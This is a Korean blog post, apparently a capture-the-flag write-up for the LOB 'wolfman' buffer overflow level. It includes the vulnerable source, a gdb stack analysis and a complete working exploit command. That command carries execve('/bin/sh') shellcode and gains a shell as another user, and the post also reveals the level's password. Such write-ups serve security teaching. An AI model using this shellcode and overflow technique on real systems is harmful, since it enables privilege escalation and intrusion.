시작
안녕하세요!
뭔가.. 계속 반복되는 느낌이 강한 LOB입니다.
ROP 문제를 풀어보고 싶어서 계속 진행중인데 아직까진 단순 페이로드 작성 문제네요.
일단 시작해볼까요?
Write UP
[orc@localhost orc]$ ll
total 84
-rw------- 1 orc orc 61440 May 6 02:09 core
-rwsr-sr-x 1 wolfman wolfman 12587 Feb 26 2010 wolfman
-rw-r--r-- 1 root root 581 Mar 29 2010 wolfman.c
[orc@localhost orc]$
[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include
#include
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
저번 문제에서 buffer hunter 부분이 추가되었네요.
memset 함수를 통해 입력받은 buffer를 0으로 초기화 해버립니다.
근데 우리는 버퍼에 쉘코드를 저장하지 않아요!! ㅎㅎ RET 뒤에 펼쳐진 넓은 공간이 있기 때문이죠.
페이로드는 똑같을 것 같습니다.
[orc@localhost orc]$ gdb -q /tmp/wolfman
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 : push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048640
0x8048511 <main+17>: call 0x8048410
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x8049760
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x8049760
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x8049760
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x804864c
0x804859c <main+156>: call 0x8048410
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
0x80485a6 <main+166>: call 0x8048420
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
---Type to continue, or q to quit---
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea %eax,[%ebp-40]
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push 0x8048669
0x80485ce <main+206>: call 0x8048410
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: push 40
0x80485d8 <main+216>: push 0
0x80485da <main+218>: lea %eax,[%ebp-40]
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430
0x80485e3 <main+227>: add %esp,12
0x80485e6 <main+230>: leave
0x80485e7 <main+231>: ret
0x80485e8 <main+232>: nop
0x80485e9 <main+233>: nop
0x80485ea <main+234>: nop
0x80485eb <main+235>: nop
0x80485ec <main+236>: nop
0x80485ed <main+237>: nop
0x80485ee <main+238>: nop
0x80485ef <main+239>: nop
End of assembler dump.
(gdb) b *main+194
Breakpoint 1 at 0x80485c2
(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'`
Starting program: /tmp/wolfman `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'`
Breakpoint 1, 0x80485c2 in main ()
(gdb) x/100wx $esp
0xbffffa84: 0xbffffa90 0xbffffc06 0x00000014 0x41414141
0xbffffa94: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffaa4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffab4: 0x41414141 0x41414141 0xbf424242 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb24: 0x43434343 0xbffffe00 0xbffffef2 0xbfffff07
0xbffffb34: 0xbfffff22 0xbfffff2d 0xbfffff39 0xbfffff41
0xbffffb44: 0xbfffff52 0xbfffff5c 0xbfffff6a 0xbfffff7b
0xbffffb54: 0xbfffff89 0xbfffff94 0xbfffffa3 0x00000000
0xbffffb64: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffb74: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffb84: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffb94: 0x00000009 0x08048450 0x0000000b 0x000001f8
0xbffffba4: 0x0000000c 0x000001f8 0x0000000d 0x000001f8
0xbffffbb4: 0x0000000e 0x000001f8 0x00000010 0x0f8bfbff
0xbffffbc4: 0x0000000f 0xbffffbf4 0x00000000 0x00000000
0xbffffbd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf4: 0x36383669 0x6d742f00 0x6f772f70 0x616d666c
0xbffffc04: 0x4141006e 0x41414141 0x41414141 0x41414141
(gdb) q
The program is running. Exit anyway? (y or n) y
[orc@localhost orc]$ ./wolfman `python -c 'print "A" * 44 + "\xd4\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀1▒̀
bash$ id
uid=505(wolfman) gid=504(orc) egid=505(wolfman) groups=504(orc)
bash$ /bin/my-pass
euid = 505
love eyuna
Exploit!!
마무리
쉽다!!
넘어가요!! 넘어가!!
'CTF_Write_UP > LOB' 카테고리의 다른 글
| [LOB] darkelf (0) | 2019.05.09 |
|---|---|
| [LOB] wolfman (0) | 2019.05.09 |
| [LOB] goblin (0) | 2019.05.08 |
| [LOB] cobolt (0) | 2019.05.05 |
| [LOB] gremlin (0) | 2019.05.04 |